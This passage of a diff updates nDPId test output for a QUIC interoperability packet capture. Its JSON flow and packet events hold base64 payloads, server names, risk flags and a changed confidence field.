82jyDWS2FNTrKtaVTKmR3FhTiIDLlKPp8T3xukB7\/896wGVPowkyKdVGwn1U7d4smdlgzTqpu88QlyVTsqovLhf+Cl3l01W8nhlUKi7h\/7LgxdSIr\/1gHh5vnSqEyBwm2o1SGij1+TJ05CbhlsZnpgh9DpccxP1I\/Cy1W\/csGNz5P7WukiqEENPTqn7PXD\/3lj2VFKnZ10TEaU4eoOK5Egn7iJWSlbXxC1+uwb2ktJYlIcBWdWgcsSv\/EVRcpOxuacQcBKDfkoJTamdzkoxAEalFWSJMb9d\/CRNa9R8Rgar09wnJqe04d9jL9dUW6cDWYyJSw+MWOP260ZOljLVpA2a1QumvmmIyr8a7jSho4tML+Kc5q0tio8WmChgQRA3uSkUpNwnyEx9DCg96kTZlDeJwu7RwrkaoKlX0GjuohysCaFrtrDI24bZNO8w24oU9Fm+r6MEXXwEQxB0LwQxQFPxdBr0HMioBlCcF10uOji69LTOSZkYvb9+AYrA2jB9gSAJO3UPpzSFaCEJqf9FZw\/TgbQTNNBsw=="} -00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434659,"flow_last_seen":1603816434659,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434659,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":46353,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00902{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434659,"flow_last_seen":1603816434659,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434659,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":46353,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"cloudflare-quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":51,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434661,"flow_last_seen":1603816434661,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434661,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":53791,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1603816434661,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434661,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAqp9AAEAR4XjAqAGAKHC\/PNIfEVIE7KqIyQoKCgoIcBuNCNTaAX0AAETSsdkQHvJcN7bcF1ORvnbsKUKjlPXY0qQr5k5uOcDOcZrEKpvgL9RbsKleW8ZMaZNBIcnwq2KO7Ra5INHkVKJRC0TkUHMwFXdKdeaESLl2Sccd706kHiSPpX2Lbm+12fv10onPbU6DngslVSwo5iC2jlneokoStHZ4sxg1C5Je9i6sU3G77ZkPXvlXk0NdQQdexNFkb5jV\/JGW0vFPxDe\/qF9kedjCbIxx+p372PhnBv7iEwZ5Yhty+\/qNKY4yyyzUUwAkAmsK2pn5dzcchowy2PxUUm7hjeS7h+ta9tYiPjGP4k1V5zZKY7Q1iEzKbQmeKLLMluT7Ze6EQ\/94FkLhmXXWckZ88YK2QIDTY12s2\/+YoUrmy0fuxliVJc4e7t5KZxll\/xsK3NXnecJzT\/C9JRu8GZI0MGntc6sD+SVMUDoRX5MmL6JI3Lgrth1lbQy1hnltXa2ICmJpXg4UGGlDL1Pjydtfs82r+A5HZhHO8I+yeL60lJGO\/pmXurcvVllxGtQGjKy0Qx8L\/+0\/h97ODK4A9BOM8c5uVRJZi+ae5YWCQBxdqswC\/na2\/hdsvvl7+jK\/hb5lcLu18N2HToRBmI2OttnAnni74F8psk6eNPlA1WXh4QFnhdp7k1TRWG82dah5Np6uhn0FWu8spp+GpOz1PstbpUlg7HUDKDRocRvdo+XzWoapXRLt2rZBMpFM5+qBvFVKX6Ap5vpKqXx1vyTZc7a1PZSOkBPGsuBfMn\/e6CFzZ\/7SKPFuN1FEHhp6qVSfqkNu+E65oEYHbyp1GfsjmuOEnOWm9QuYUWXPMO\/ZpslsQLq28PkTI45zSR3jBaqY+U4cAU8hHI7Y40pZi0OVHAUG3Cp6mgeeNysES80m0WoJn1e6vRigeA1nc\/I4X7I+sPdNk2rBF6nEfBWEHw7MllB3iWKvvfivqsRWGfnLPVIWWdgqIoeFXHZ0RtFAK+dhBCktFzDp\/q6hAfIktX3z+sj5E4pGLpkcvClK3JUCXIBwpBXNz\/Kc9u134cEFWcWfbtjt65orTzu8PxGQYP+2jYE6lnk\/tcEolSkAelGkBK\/fE95QONEIEfiGb2tudRlXWTXRf\/FFFuldF0FdSJr50n\/Ih08O2ebAjk8ljjBC4Vr56KppkjdyyoUri8YzcV36sbFJqSwNQqsETWwcWH3GRqKMaQ+n+GVJUfR2mVE\/e4E852F32tsINiUu9KMW+toNgqOQfW3axNf6JaPFYtyy7MrNLsqhd2DTcip3+w6pKInaMiPiiKc8Fs2riJwto+W7a3bpQaoELeNUhEukCZCq\/FzN9PqVxk6EFWsqUSSSGklINGSbIS8sc+UAhevcQz0048wkjFBmEZFqu5A\/ObrRfWUEjpP8hKYzq9fOtRsoabYuH0GT29NVVZ6mp6+ZCCS2cAvfDT18d5ydh7ws+klcqRStiKM5PnIuDiY9ahp4jcvj\/XCvOWH28khmORKIgTIM5tVtnApY5TcVPqz7Uqmg2PcjSYyRBrJch\/eSfjOrA\/cCMqhxLApIy5m9eIL4iY+YzrKwVPTBJ1t2v4mujsR71BWWVXgie2CQjixGfOz6PTiXloHY0ohyCpxw0Cg0ysy1PcwnMPh+3oGN+0IKbU7LLyLHzUsIyN44wigmXzAl6Q=="} -01001{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434661,"flow_last_seen":1603816434661,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434661,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":53791,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01001{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434661,"flow_last_seen":1603816434661,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434661,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":53791,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"f5quic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434664,"flow_last_seen":1603816434664,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434664,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59515,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1603816434664,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434664,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUA4mFAAEARxULAqAGAwb4KYuh7EVIE7MZSwQoKCgoIhDOd38iF14kAAETS+DrcKxcR6weCAMpXP0WCjIu9ZBcpWi0OIwLjGToed\/giv9qrtDo9ivnhToDBOwIFut7lx8oGofCTHgF7Bu0VwbCafc3NxbT0fVzbuULC9eYaVRWQHPCUD3HNkinLSEKLzkqEotl3g646wEpRi\/ugoezcuEqO2y6FIB5R6lgny7Nkkc+zMDGl\/vVsq9D4yR\/HW1d+8htwfQLJRpA9hzqrxRXBKybzFVVjhg+KSz67S75CNguDyG4FD4d5JXshyl\/M4INjh32wAMrYFGa8t+2d68fOM2TsdLASGnjmnLNA7\/Pf8UMA6n7BdmW2IJneYpplOs2JDLXzJklKXNuJdllZWQX88VAVkIZdlhRUIxXv\/f7UmxqAgBcsb65UxpALzeD9UOYFX7eXnFX3CBNctLx4OV4vy5qTojgYXWndnvZWDyo9r1nMBp8D6VlFL3WOfCfGoqwqeHusn5C43hBSHrku\/bXz9iJXIhkW2exazvoHN691IPr0B73C3NnmhicLFxNH7FU7WO\/4IL+6sD9DZXTIjSg6oTpPZcbUD6nL7y5Da7hPow3PhI\/sdvRXmbzab8jO1EGiZZHwGfa4q6m9yRM\/TXA5uhhLvU2EfXT91420relOj408ZVI6EUSGceNLMighOPfPAfp0WOhbMCbd98H61M55hJNktUMuazO1d0gcsWhNN7ihq3R6vEE9ycG3wWK4AZXs7o9pNpiOjFyi\/1mC6Ku8u1sBA1oNJJOJnGURm0YtMoufHAuKV2LJVu2OeQAP\/A2\/w5vSvzrQLOGEBdMHP3rIjZlGA4ez8O3T8wl88X4DTz9tphYgqFCKVqs8At9jd7jId653CvC+xEYdEiNG9bQtgVNzXeRz5DgAY\/Rramv\/s0Mz9eqNUZ5kDg4J0SUVs70edYwUxeTQM\/DGMsrfTyMpxJinyaJ+lIbkswjz4fLDe6hTAtCperVOSIVU7PFEEJNopz\/TdPDhB\/\/OU+mjuGnm9dVJqiOBsKq6hwakuMJMeEbqZ4oR6\/2tTEOQMV7c3m8hAgBlfCT+et0oHj0In1XsO41lgeBhcmsxfgpL0+MgrRWpX3hNlmOw2YFL7IPahaVoqqwt+hlD2GAaUYWeZHKQIID8JZod24qH7\/lYJ76jofC+JdWXEJ7R4KLVHjma\/RdasqECMSrg4m7keaHTZDKrBR35ahliIHV+sND3+6E5IN\/2QdoUlOi4\/UYlyycPYl2QrEjCc4E8TPnrA7HhR8cbOqvr2NJUiO3vmvNIk9u905r1d+yKr0KSvjEMW4aoGs1cnkqp7BFwfwUFTFXE57dIo29rq+a60tDyag9gqUpuo7QsXjOi2fVAkTyRGrjCd9eSs5MDoGygOvvn\/yw4ZAA3XpTxroAMLQ9Sj\/92T0qxoDCFA5OG7E8A7GbyiO5B2nEiMAOZpw+5PZXL4BrU03Z37oc83D+zHRg9XCBGkB3eyfyP2\/ya8kSOgnWI5DRzDtrL+axTWaV4naIX3w78wYegwyfuMaorTISN4Ye+UzmrsF4ld5d7Pp68ZmvyPCebtO\/KSElf\/sucwWTuBzbcyui8aFCG0Vq9OlG0\/qaPlP1qL9A8E8F37BOHLRzvh\/sbn8ks0BPPWFNRGNxMVhkFaWjx9NYOtOhnexATQq7v4e\/jeA=="} -01006{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434664,"flow_last_seen":1603816434664,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434664,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59515,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01006{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":52,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434664,"flow_last_seen":1603816434664,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434664,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":59515,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quicker.edm.uhasselt.be","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00648{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":49788,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02146{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1603816434670,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434670,"pkt":"pJGxgjQ5PKn0qB\/sht1gANDQBNgRQCABCwcKydWupNP+R2kegH0gAUgAeBcBAb52Tv\/+BGMdwnwRUgTYPWHACgoKCggiwZ0u09kvJQAARL77XjijFoQtvpL+zAbPeN0VMZAH77o2Zf3Z\/VxyA9MhcBb1aoo2HyDxw4AGg1rpwYEvZC1KOFbHEvRCy\/7Qr78EUwCK7jfp3PwwAQqSqWeygMwdmPiD9xsvVeM\/Lg3sKV5Yt9sS6nVuVMVaAANebK6ODqzmbz6o3JQ8SCforD0NMCEzwS4zB3SuPu96Zlh707dBA4O8O9hnahrfzpYrma3GTkWvQNZm+MZwybX+ZiPVsaHNWO4eC2QTnSZ5AQr9jvuvVHtv4xtMgtNapGHmqllBavgaXk+UI6hfTQM2FE1B5tGaz6wpXpW9q4R\/XybVurW6TyGaQAE6Rv1VcNFUQkd3osuzBpTRgRd9uQPLk9nYNE1PNSuiR91fTDaJoLkRppS+gpYwkOZenhVm6gOiHF4bfs5ERt4YlwEn2Dp0u5C5nrVVxtfjnYJ5IwT7hUHyh6h9suifUimgbbxzIaysmGlD4k2fx9pmDLHsUHTce4UJVqFY73JtMr6k+yW4T+WXDKoYMXAeEnYYUrI05RCVc4XXpAwD9xw2VGUTFNaUBIeHo7WcMaqEEgdPOnluAhzJsgCW+N8o0F4I+kCQseYCSboaFjLBLNq0zPRus1FaJ\/zpb0BAxHAiXlVn\/igRt26xRMAbTnTk5GPW7C6QEex76kpaaQ7HDdZHqKpOAkSMflF7jIP40HYHAQatrIYPmDQgSWfN880GBmzH9sYEwnjgxWDiL0+toa5E6wd7EQeR8y5+\/Dc5Uzh6tsLpKuR7N9HU++dqYI\/gOtoO809QFWpju+r6P3XwUeBL1ZT0bLR4yPGw3dekRK+qnie3Kqo5b7bYJauiDOWg\/Y4N7gkZK+lB7oklk5ykDxrBCjJgZkBXy3ps5MBGX6YeIhFLnieceXGOD5JF1MA85KdmciDwctd24umJ8IcaHVflsn7+7ZNAlehJDPmcAPO2TlEPY4\/yHOBUFJG7kAZebLJ+uJFdZdWkSaRi1YFo0sxbTkoNNpO6Hu+zAAN0IAy5sYg\/mLzAclK2KdqEZerl\/B5NatrR\/cF5OTxG9p02zemz7BknqKEgbaBN+IFnswhrUXlOTz5kf7R\/m8wKuhLc\/igh6Ij3ng6sR8vbemM2AfCHREP8MbsPro6xc5aF3dAmmWkn13MUXrpl0LTzZdwzZdq7FodGh9dDjxRcZYM1N8++Se9XsHKEp6uPV\/JaA3s2p5q4ZevQE2LX20v4OvqdVF0MMSV+4OZz6eMTL82DKbZc3CST1ORXADs6BAjz6it9rKE2XOBrS5gDnpCiRLCFudHLSBlymJbI0g2CwumFP5vBO4Zn9qFD7JxrpYjBkMOpt21xD\/BtOBNga1EAbpK91wtD+ubtYSnpbhN0OrJGtHIFjpiwh6Xlp1yrbCWvXV5CMDi7VuMCY6X2f\/duWafjiHD8aUvnVKBJpAoeqDFPimiegbb28SnwJ5uYauvYPhvY3ErcbIeR0f\/m1a1DdBjB1WQmp0Fu4clnTkNaqlT5MCeG\/48z1ijZB7ZQmAcaHRGOM2gO6JTlbbBnQAYR\/DVuXyM\/B5q+uHxWP5bTLYV9915QZrJqVKV0Gf0oQ8wUAFGHwVAmWeVHB64hlXfKeooZTyi+7AZWKi3\/lA=="} -01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":49788,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":53,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":49788,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00648{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":46242,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02143{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1603816434670,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434670,"pkt":"pJGxgjQ5PKn0qB\/sht1gBxOBBNgRQCABCwcKydWupNP+R2kegH0mAB8YIxDSMFEDfZ59dTdPtKIBuwTYLLrDCgoKCgiO5tu+VRPaUgAARL67x5+yoY3pY0MJItv\/fgrN1Aqjc+LGtbVLhqvz564YTYsK8b+1F2va9jRV8nEV+5OOHqmqaHlOCYYabeXxngu7jBV+i2zDD5mXOeNwP0vYEvtnoouvzEl7eLb5EE0+MuDiJt84m7jpfeD9j3nru+ZcUw2gN2lqFsUahOHFHxiiMRzquZrGDqevIu7WfSfXXUaDgMbSDA6CvWRjCP72DFgLsQ\/11QQP633nQ0SLKipyJqDr4JvqJmirsRRFK4Y2O1d4rwaWvjBQJbZEvrKGBhUisRe4vJCgt83q62hhhVwI+BmOHGZwcH1NeIw9OfXzIkzF9MfEbO7hX8+HXuUKtpvyJorRIV9+dNth0bRPExaC9oZ6eQgb4KnoyGQunWwMuV7XDIWVGPpUovXJ6L3rc7vDqV0O33okP\/XwzTuMfNCRModoaAMilI37jOSGD70L7Ukxtnkod00xzN\/rRqaOySSScNetQaqN\/b8SumEm0AclR2UEqVCZ\/oFDQW3dlFzOPiolM3TYJHmvPtQ07FoMBnxweA07DzM\/nlIehmUnkDIdfazZlo2WaXyT4kUCXiWSLkyBIKG6OPjGqxQRCjx7pyzScO\/zoIapRT5uA7FxkYfHjnUDRA4N+uhKsfgAHpDGOcVNfY46rti9HRBS+MLjtON8leaOxJHim+wQ0EeQlwbDu7H0Zej1LnLoFqMDWvyz+oUpsvxNgc\/S6MeDK9+JJrebwrhDc+tkmOK548PY4XvYXrqaTGIAivVpHbXZ3zU4Se3IsLa2rpf9EZv0u9D4VcFJRqv2B5CpAl42JhgNb9SlY4QjX\/zYb6IVVivP8oR+boam1SbalhEukEzoSf5vlgVVBVsupKLEgg8QJ4aPvxMTspsMlgkwzLYOK4L5ecOdzbax+0i5aGOmAs30VE0cR4zt2Dxp0GDF2dDg\/9qdw\/BFFFjufPPrjL58CEC5anG+0PnjLNiz99f9A5oIivUVqwWvAEBh3kOUatfc99UXPxAS5VMTgfEOgcxECNa+3dG45igyiOYw0SklHmGfzdommYyu2F0JXKQZKPR4P7uTdH4l9rTKALyu5hrveJCLxlBPzHhp5XxWlFHpXE7yqKl6JoqWNO9m4KnOkD1SiE0BK4iBcHTagyf\/j7KuNtCJQUEjQ59\/x7ZF1iPKFPPyQ+DFZfS4ZMMJAdRuce7PfZ2jZfkuletLSo94qexc6EAps2f0\/fcQwBTkA1Pa7cpknrlPE6nDQwDmYjfxjl2FPTHYb04B\/4LG+OuYH1R8tH+E5cKey0fYaMhnlyRtm7l4zhxXh88eVjpaZDsIoW7JAZhBUfEztlZ0AOc8r\/vP+qFhB8f0D7eEfpR8bO8\/EgtwQtTbuBaw0z2uWUEDIaafMNhsQ1f4mmfFO2liKZH6G6GRfv99KKrH35jUxqsjJeBwQM\/EJ113jCKlIApAONDGVtmrUbUM7eAMD4vuRho9kE\/w49GkWM1RjqkESV8QnS5lO0lusZRdgG0jcilTPBNKWvJtuU+BOtxOeZOoU0KAQk0iRVOjpxTJNLkEFDMqLOTl4GP6l1DPyRiUIbC9dxVJliklcqIHHcx9Son3\/0eV4Dlc9XMJzUFYLYDpip1il7dd3MOMzw=="} -00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":46242,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00923{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434670,"flow_last_seen":1603816434670,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434670,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":46242,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"test.privateoctopus.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 